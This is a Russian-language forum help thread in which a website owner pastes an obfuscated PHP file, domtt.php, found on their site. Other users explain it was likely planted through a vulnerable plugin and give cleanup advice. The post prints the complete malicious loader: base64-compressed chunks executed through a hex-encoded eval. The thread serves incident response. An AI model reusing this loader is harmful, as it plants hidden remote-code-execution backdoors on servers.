• DONATE to NULLED!
    Вы можете помочь Форуму и команде, поддержать финансово.
    starwanderer - модератор этого раздела будет Вам благодарен!

Помощь Нашёл подозрительный файл domtt.php

Статус
В этой теме нельзя размещать новые ответы.

Vujko

Постоялец
Регистрация
24 Июн 2011
Сообщения
75
Реакции
9
Зашёл в редактор тем на одном из сайтов и увидел подозрительный файл domtt.php.
Вот что было внутри
Код:
<?php $xr_xg = array("eNrFOwdX20i3f4WwORv8UaJuaYnzEZppJmDALZvDkW","XZFpZLXLBNNv/93bl3ZlQsSHib894mUZm5c+f2MvKu","Be21jTft2cCbBsPBvb8IJtPJxrswfJfLrX1fExNrYb","jxNsh9f+sWPo3H7nLj3butd7V5oYC3d2s77/CRPdTY","5ZN8vZhHj0ubPV6w505slF1x5rbqWOzFrS7YbVK/sR","UEYZcHxNs5L7L75WOztt9lTy18D4Nm8S5/esSe1dub","u7sOe/p8YCBtn5f7NcJrsluvqeNKdnk6PTLvTg/rsx","J7O+ghGeyxyi4Ou1hAzqTOnm6QUhVJegBSjhHNqMlu","/fJjSy/lT4+BjGMY67PBMruw8c5teN25vDEWn9nIcj","9sBoimcveEnHa8Ae5glXAPw+R7zEo3vU5ZQ9AHl900","G3GyS+nh0/zzIYoF4ZGFh9PF5c0+eyq6tbOwgbQ5Bo","rwqcTZNBZc2i6yuWCSVpEl9grks1szxhJ7B7bYTbAb","Zw01inphLKJCkcXK3bKHc2WtgsS5nHxGOpKC7H9CtZ","UOrztE02LCBkjkxApqT1rXWVjvh7gLsndgzy8e6oU0","Sysa4wYUYw/1pyMhcTZHsTlk6zZkV9Ag4mQsEnvs9e","5pgjAeuwzqoEHDpL1OZ6XbT7jX6VErrGvTR9LCKbvO","YW6O1nB7pOAIGm9j5KHlVPpkpJ3H0tLQiP6jObDo4c","txv1FxpsiGVg5huKkDRegJTlCvXYaNIgho6517Ula8","wyHKHDwRHZX5HbneKbkeeRc4ZsyR8W/cd5Fm+XpdvU","QWG7X9yEPvUPDdZr+l1qut8HOwj2JDsgJV9ZZzFFSj","auRRWLe4dE7ejYvnh9dDtgUalObMyIsqDy1pBIjxsf","kwlCZ3rS2kR3gaork86CjngAawwSMxzTk/oMBzVTxb","nh4g95ucV2XxWNeOFTIfZ1Y7HD4yiyo6yGi9Viar0Q","zrlKLb4TXdkAikB83jQFImJHkWSO/UL4P6Q+kWVb04","C3DM/Hwjzf2BLMLrnz4dIVsIj2NovSrHtaCxIwlXOq","g/XN52hH4Y2YxkRi4MIW4eVJELvdVuRe40qWmNR69Y","mQFo6VqSfoUS76inJ5eKX12EVzetB5LBgqT9MJrWa2","ekEc0YsIer3iWG5WbQQu2eFnmgQI0iu5OmdtzjMkTD","P1BQXGV0p+5Z5XBiX2gd9aoTM8VIddLXkoplrhFZyb","xBysFtE2btaeQ74DdkT4QR/Qd8h3SNkkdTAz/CiJ2x","sqaFszoZn9ooVtrc5biDYpDk4ABaMcj0L9sYsggUVj","zVq2eoEgDFJa2q+cBzGgq5OSgJFus8svH01W6taq9Z","PTbYZrCR2iqGjzwkKJT9VMFxU68o3gn6Fk7VtDNio9","8IvT5yPGuQtyOGKqpm2tTPTNxTW4yaSEyoMJNBq7jT","0ESvpZIatbMliRbJbDeLzoAhhBshqSy9vrP0orDU6I","cTkIPqFcEXZRIuP0W8xyxYpvBIDogVZIESFvLAfCoV","gFiTsgG5RDKpKCALlbImymKGy7gsqhWSAfKPYiL+gf","friAuU6NkSIIFnjCaSb8FzFE1pK8Y3QqKKkP9qmfIj","453pvNVGjolXlEMtyWvtU6IO48G7fOQcVu7UY0ph5f","ZdD+3sCpUflWk1euSL7og1EdJubpC4/bsajjXObo9w","AIPVNQKrx2zZUfe6puKSY4pxmJVrmdUgVU/zGTHcmZ","0HZbt2YA6pqFNwnI+hIDD9o82WMfFdBMNe+1j69wwN","pnY5v0AfZnPzmYsx6XJ+husW3gXmk9EQ8GNdwmDq6K","+N6dnJwpOprH+peDKYoyIYHYpXnPfOrxNx5+Jp0W0c","GrPzh9hyCHBXgfPkkjNcPFFibJyUNoFqwISqhneM3J","sX+uWIMFH4eUDRISi+90+XqK7AkRWTe53MzLRDUEIX","ZMRIbyGitFM5QIQlYycDiXbfRLAipKdb49HTejFWIR","udbuLUA07Jeh6lIDYHQVMQ7ElTQ9zOU7QZlQa10qbk","gUkGZe6EzRpJBuf0UpwA7lEP7pPYieJnU7scc/aE33","DCepTSPS57B97hGbNxiWN9aFRNhVIa8YDGh9gvqawa","lIUOnvgSt0YOehUY366O5xis61pIdvNkUIaccwNYKG","ieg+tNbrqMENyxPrgmbRMxSY2iZQ8Ro77fbQ4W/aZm","Ku1ieYSRL+h1aA4pMaEFcgA1epCLYqpgzdLQukr7hK","pesrny8LyyeCImR563HDVLB8qyVptIK2nD/HnQnbdO","FnOfWiPw0C5VxX30/mWjv4AGYKG5tcsRFOQTF7VWNh","luwCutz1sOh5RTK0pTR/RD9OZquQfF4IiLBPVTv9kf","ev1K/4r6oG8odJBu/VZatXex7D55xWNUUrvYeGwOyr","KO5dkVnfCcvOGxQvmcfGw+9EiU6OZkOSmR6mUUJSdr","iPrXEXFIxXmDhWO7hc/hk1s9GzWj4hS16t+EINahVZ","NBq/TtvHgMeQfR2i6R2YO6YXZ+Y8BcNyQzbQ1B5Do9","I1uKewC4UOACX+mbTI5Pn6alUMXGpYSTKuyLEh5K+Z","+Ube+kM+JOJsSMQAhDRTbK4+oGjVkW1CR2EjkF6uMZ","F7kN1Qt6+fktGXulhiIm/2ZixpyBNR23XGQHRR1QWy","hEfRGMEFXKktCqBcufQ2mcZLnITrcb1bHlx3YRi89R","o1iG/gwstu9oUIb0myR2pKjGxcfxMSvvtmq4dtSQFW","SZ4hPDIQ8fUBTdU5zvLhtSB3VhKmiB4NgIAHGB3WVs","OD+5nEdFjRlZa9+Zgcp7UYtbH0EQq/DoGomTAkDCYj","GqxkWJhZgThdTRIzgrOiralkriI5bIQZlzUtFLpSBZ","O3dSclAUKVMRVw8WHxD+TCHOz2FMjChCEGVRqpBU8S","DE16XOvVp3LmRmwHjIRIaqYSJj4kK6qqbd6CNLM1S1","EBWqnERFrV+UjPTWHJY8Uhldwe18jrql74MlIjqlQb","2LRVmG4gPPZaTQ0VPrhFVmLJyJggR1C2Fs324WK/3W","QUhSpCaBcWLVuL9LLVQmMpZfyFYubPl0JDO5RE4Ukp","A0Nl5NaJSNL1TpoyPszKDAGEisNoHydBv1nldUHGLt","7j2Z9ukheXajqj5dyUZ4wlInJbd9+4qsV6ZZFPWTQa","Blci5KcGh17YNPNlU85VED3ZKDQtpkKZNotDGNsnex","KdaIo9YJpvbNNqcL3UOjKOrxTU/KQevQlFwCfUodsV","6zxp3K4f0eFX/lsER1UbnSxax6TfmXQ6Gz1AlKlhRU","m7ajQ8uLPqiXF26DS1YqxlpMrEA0SHEHZE6or1ubMj","i3QAThmfCAstj5rU0VR8yno7INLQjqmEdKzr0hL2FH","VyTlR1lHclDExMABlII6gFKuE6Ar2IGp6lzQKTgCaQ","bS6amtNa866fqWr0ZVCi7ZSiaIq4f5o3tCFXnzEFXW","Wk4KcdUwgSfPRChk4xS6QimaulMuodtgnQbrMqTRf0","Z13qnUWss+pXRjzmXcPPmEQ9iwmPPY0IVqerIQjTqG","916xO+eO7uGcOufOVqGO47oQOyxr0ZZXqKP9ZePWhD","613KUgc2df6GzMEGJr1WLmFnW4V7IeQGgOKaC4YOde","/24T+75yD9mJjmT4GUncuBGKa51bsN7oeiGFek+/Xk","hjrbaWJeLfKR3P81Sk9ziPnL9GTR5GLWQzi0Ps1a2a","/ebTkWzxj1CVVZ+OhI/KtRA5vL5VHOTlaCpt/eYTHa","TdyDq3oVUUTnlDk6pWiGUpsvODrh9LaPGT9ZAqU+Mb","9GZ2DS2Zcm6Dgl6fV52TFpcA9RcUTWo8P9MBxzGd7g","UCl/Gt3nd6/g3B1KI131gf71YhVIfzWfsY7v1LflAD","NQcV82wO721pcQwOH6AE7MTWQimll0Mvtq9brHQbsc","zFrBN5H0h39mFs2NTUEOdonI1RVquSKTeTcvkGqnuI","Ei5bt/A5/jk7riVciCeKCXpZaWqK4IkqbsEPVd1Dqo","MYLRxv0Buyfl707yw68CiF5oYyOWGBlac9gKnXLrkn","yqqU4IojKjsPyhhj3T5Pv9U59e/Fy37zpmy3TvYn0L","+DbZR6bXjGMxLq+RVO3xz5KR4rDYD3iyqDJy8/ue4B","HsU7uB6dX/P8dLqQAeNh3o1sWJHB9UbW+ptX1M+zdj","mZJjCegvehDaVyQDyT4FS83BPJ/+xRVokQ63mVGaWF","6LyNojSynUgLyEUqi0Sp4fnATunrir7UJVIBctClUr","EqV/GYL2I7vaF/Rx/78LXDIxR9PvDo8GvO/NPTz2Tx","A0Xl+yveoV4tZfII2gfeSEQzOkUxv3nL3rB26PCzA9","SEfRrVRoPzG6fixhK+iq4MXVZ5fhGrGVn0y+2O/els","PFhruhPfMu5bvjds+Rtv3S9vg6+53R9rP4J2xsfS8a","DlvcvlvsuPpWxgI/f97enpvVIYD2eD1oayqexoZuqS","22UgqgQxNg0a0gphuKHkdtvD8QZ71wUITesfcB09b2","7STkahP70fuwAV7ci2MXNbYkDdyZupSy63O5kHU6+L","+xi57x6wTs8fCilEEmHuLyRybaewltoz2ssBzM2x7/","Z2szAacRxed7yRpt2Kk23H/+ZeRKyxPz9Drjo7RtYl","2tJS4W9ypzUxlyfsZmEyHYf+ACnQcrtgGqjwj0IUf/","6JYOn3DwimbkfC1WP/vfya40i0L4hq+yXb+vqmwL7a","AxffpTDgXSMTUra3d3/44cTHSR3evOFgGgxm/u4P4v","nHD+4MuBpeM20fZDD2H0fDScIB5Cjyam2xa57osJnY","2AzBEEBuK/aWz0lh2oVCoe0ClTlOC77sMrrX+EhMCV","ZuGxdtx8byuecod9tTf5ygGkc23k67wQQpdnLf2cpg","ct8cDsMNTjfObCEUGIigYtaEaT6XAbgpSKJlL9J0H7","qT6SphOPwidTGR/5TADNhfpLHpQ1TyE/TRUJK2rH1l","kMgS5cv7rQolNv66nbPE9Pzm07nvD1Ib41hsU1VJ7S","0EQnOrdvWz/bK4jSZe2nnFVBJiiq94loaOP20HoZ/0","aDFIOFTaXKObXiCcqlFY//vvdWmXrWDMwaUZDmZhSE","nPLGzwNRiWILT9F24GxVbVICCVBYv7sT8KXY+L06Ct","zC2OOQsQEEH6yIZDRxH6F4yYuUI8mgO4DK1A+39jpg","Qr4raUtQKib/ofT0gqpWzVKhDGew+WTFOU7HKZbryh","h9x/t9MJnZDpm4SMFuQLLv4wi6+3+Std4ztYoPl5F3","S5MQme/CEFWkirf/65Rk9fBINfv6Q3hpzCicJYrjq0","y/2kG7SnAhFVMEphOPIH0gScCKvYnhInVD++2xJwmp","LLvRExn9lRXFuaugWaBfohK2zEk+/PhJ+TuQ3BtUKa","pLUdEj7dNZXln5gBa5pIotpPDFLj6TUFCGTnc5lw+p","evBRrgeoP3SGeatrViKZomLCVHGXyNiGXuKagFXcII","E6zbjI8yrwyDQS/iigUHl1d/qrbmTtAIdJT9aOx37v","uuKA71LS5snIRl4ciddgUq0Bpl5xyZI/CRBqG8Lac5","26La+JEoONT8c+HJ87REZIJ32sDgOjK5AEHodo5ZjI","NXVaGbSuXFKt7ZOLwPBgHGXURkEYnml2SFG1OFmVvx","zdxXUmy+IBGCT+LzxJ8OR3xlfktVFIVUCZRnARiaDD","XZCHRZrurPgThODCqrSnyONNUm0iwU1puNPWDkHpIA","k6oKhvPPP4kRCN8gtb0MXKa29aJv7v7IWmXZsVVW9F","/+5dcc9yqbhO8vfI9j5Hx64ZD3DGyIV5mavRZZ7/d4","1WuDEQoXWzGY9mTo9ViQYwbTCYdNN6RVDjVmyuvM5z","VdALcxIx1kVINsnGc/ZlhJP2aTUG2v0+w6t3RdJVIN","gXbPX4xC1voy+HyEjE/TLQqfuxxJOjZqBlJjEwJdJV","ui57V//lnjT1QBqE5EDetToNf9ga9aAaysO5xMm8uB","2xeYc/H25TmQGDpVoNMLUnEU1iID1aydmGm98MYZot","Cvm1uJ7pM60F0Qhu/2mV3fT4O+P5yR0vWY18a1+tJb","1BDpPPPqVmG9eHQrJHhye3v1Xt1R/h7/PVgnri3o99","ZPQCR/kVEa6bmy3/bH/vivte50Ovrr/XuCIoQpWOwb","ecaixXcTf7z9qeMPOHpdyVqi53bbo9l0IhinWZH/37","RF9cE4JLbybGkblDlJC0tVNCN1YcGjHXk0YKH98wn7","BTjaOB/hYlUdwdoFmosZs4gKDqfJLpC7OB+a47X3H+","n694Dm1rlV2WlXBOdmxg8BlHa3Ix3KzYCMr3wTJ0XH","6wLC17gzOGjvrPEVGwpO8rSJE4fmYzZCJyOFZvNIAW","yKnJiMDSAjyV1mbMg+mcgKM5DCfinMaE5a0hBXmKR1","LUmLoTA5CKPIWMbtwqDmBVgRp3+xioJLKpYTdFaYRH","VXlAN1kxWm2MtYQlp2gVVlDOKelaDgLpON9YS/rb8i","C333ve4QN8jneKVqrO2wd2AZstKUUfZcS8dOMtMdHZ","1uoseTKFR+lIjnj2A2qeyx/p6g3q+LgC7hEUpId/39","zn8+NNWPH95sb/9DS/7Z3v744e/3MLjzn/f9SbDOVG","YoUWaIF3/Gs8dN/iLBg7+g8z8eFQ2D0W3wPOP3R9Ol","mMeaNQOdjye3e7JSMChKGdwKAePDMBgw/RrcvgxhFV","kIJ10/pLpDVJGAYS8aFeS8gGE5mfp9JGrYvJ9M3TGr","H/doWC4XmAEkYVwACUPQd0Gl47uDjRc2GrmTybQ7nq","1sJSb+xWZ72H1MhrMxrwQMs7A3kikXhMwESkVjTHGG","TA17MjcYpoSB3LDXZk0Nn5Dx3FQ19g+LyVGUEGBpRN","Eq/+Ohd0/l259/ZhMsIATR1Fe8FNoKH9dk82FQBjAg","GnDLsVL8Ugm6ShoyiWStToFcmMZW5WStduvPSc56OT","xHBYqh7sRKkuff8DBJxMQMollC/zf8rPYNKd5kxZAl","hkQNgaSSalOWIiJQd9oPJyPfC9zQ67pjjtfAdUFnwE","7TZlD+3LvNITjMSv8HvgpO0nc7gXf/bTac+mBZUPFD","CbgRtXN7oiyEdrwfTOMz/ng8xEQF2INBJzaVKVuWgc","Byp/xMdi/2jkZoM5zpQSdj0FSyBtWsQS1rEI3gWRKB","X0nehBKmGX1vEfjEjPnsjIU+ZebT41CqXN5dXKRGne","fwWLEvVTHNxSHU3M8a12dDC0Pjhvzzwp58Q7TaCknR","nP7CHHV2lrk6YyVYj8bzL2CzY1/XVmedLOFgnWvkV8","616FglD+J6e39zVK4clb+wd+aiu3SAJ87pIN59kJ0S","4NUY3mew6oQVuBaHr3HkMaeOmJSffeKQFosUSEjiNA","pISR5YZZCQJxKYqFJLeUq0o4OmvCMGndjpE4nGpvrU","1uhGnNmkT5tyhE1mbdOWNh1b2XRu5RAWh7A4hMUhLA","5hcQiLQ1gcwuLYnCRTiUhyxFkYPwxTVH7X+F3nd36Q","oJgkvGDC3OLtffno+u7o5vYLzlmxKFyInxgoQEHnKR","i0Q3fqb6Q+pidx2KQfpJNOIYx0xW9qSeSOqMNezmL4","9VyebZrybNPUxcGysEsIch9X7B35MpN8qbxeNZVnz3","Qgir58Fv01waxppA+hTZXff9ZDoT+aJp2VE06Lv/Dv","L/NxMJXnvyw+73nd/rDFX6WLGxpPLtir8BjGl9BB8g","oiEk4+2s6H8j8gGalcRnrkYeysJwahrULkOMLpmB/S","mzY8B/2N1f5J0JBQr+FI9TpZZ9emQ1vagnY72bFwGC","RPzwlYIVWk6sdqg6yqhoDFG2QVQm+Rdi0lbcqpbREH","P6yzhOLV5PYm316UV2kSrN9AAj/QErZnvZIE+1kScN","rh3eov0aIpr6OFDIedIbLxBO8MBaLkX/9Me4dkoiZR","CSymwCLOJk0rhVeDUhMMso/VHDdExGXphbbsFExsb1","T2fWW3zXyHYC1dchI7tYKkv7s3Hc6EoRKQpfGbPB6I","qMuxY4D1DyC5j7NRCyIsD2sf3rOhdbnAylgwGbn9tb","HfHz76rdQyfsaAbfdqIIjhGAzXGEBqudBHZuBJLB7P","s9bT0UVWntF0mWcgav5aXoE6/ytPK5ZRiFcEqjyAss","xC/OM4znFnsujgfIUXVn7FgqhlxloLM/5P7G2lDQYw","7O55wxEdTFgG344bKpa1kTFY9LHQsvgtOSkWce+LQW","WSbiRJNyLSDflPJPvVpd9/HpQZGHGdz3BrXniIYz7h","z6suZRkZLmXRlwR24pTlUiJW5F9yLSHsyLXEeZqqa+","KkL22paSN9xkZ1stEIoWDCLqQAhfVhyUR02ZwSGo5R","ZVFHlblh/rniS7d/tfjSnVcXX+LELll8ZXTnLxRfv6","tuWbHb19YvPy8xnktSBi+bxZmgzE52IVHD2buvTxuG","/lvSxk+SxP9VsH9lrDcMadaWU3jJeA0s8f1HNyR5OH","QEvvG8yxhRv5LHbwMqO4DDV7WwhwYwG4/BAPB4ZyMW","HgwbKpgUMYgFhtfpdyzQ/+b+aP6xvc2kg0fxz1HhRF","RoqeBgCq8z1AL9hpjI06MGTjXFpyvwzPgvfuB1L/Ej","LSNPP7uMf/+30/8iXHv0S57ZIPg247qk4iPW22iyT0","r9cuQVDr6XZW/f/5cdy96zzp03hPX4A1RY58kb9sH8","JpM0NicWA1HCGq9XDe7GeZ5phdeCl+9h5Nj7v+9OTO","PXuxPT/PetgWn9q+7EzP8GEux/1Z2YzovdiaW8pjux","1F+j5fe0FHsrycHCo9fs7LD3mvTAfm6Ftm0WxOfOvJ","Y+sMubsQM7c1Pjx3V8zfp8Pif/0OgrJrX45DlbfD33","RhPq9tlAemAylsa/ROZN8SUyx3PYH+4fNAHhFVLHT8","JOLNL8hkBjG/G/2dVxvJ74fwsL1kuHFr/D7ozfaHc/","XkyQVvThKm8lUtxKvoReh1w1n3/JimPHzib94Xacz7","DjSAf3LuyB2/AglqeMCkVfUo3al+f+R5mvXL95O61f","xMsDW97OpafpS3teex+sRyD8uyQl97Ud/rNyhBNAmR","kWSiX6wpmwW0NIweK/xTRMcQaQ2ghpFYc4eftf75Eo","KvJWvKjgwYKvee6QFdb85JA1M3SQ2a39D4S1VAA=");eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x78\x72\x5F\x78\x67\x29\x29\x29\x29\x3B");?>

Естественно я его удалил. Всё таки интересно, как он мог внедрится и что сделать?
 
Ну вот 99% что плагин стоит дырявый. С его помощью узнали пароль от админки и добавили этот код. 100% что если его не удалишь - еще такое сделают.

советую в гугле искать вот это:
название_твоего_плагина vulnerability
или
название_твоего_плагина уязвимость

с версией плагина ищи как положено.

Но это толкьо первый шаг. Может тебе не только этот код добавили, но еще и тот который ты просто не заметил.

Плагин удалить(заменить). И это программа минимум.
 
Да, именно так и проверить.
Проверить:
1 выучить php и проверить весь код глазами.
2 сравнить с бэкапом
3 установить плагин который постарается найти все подозрительное
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху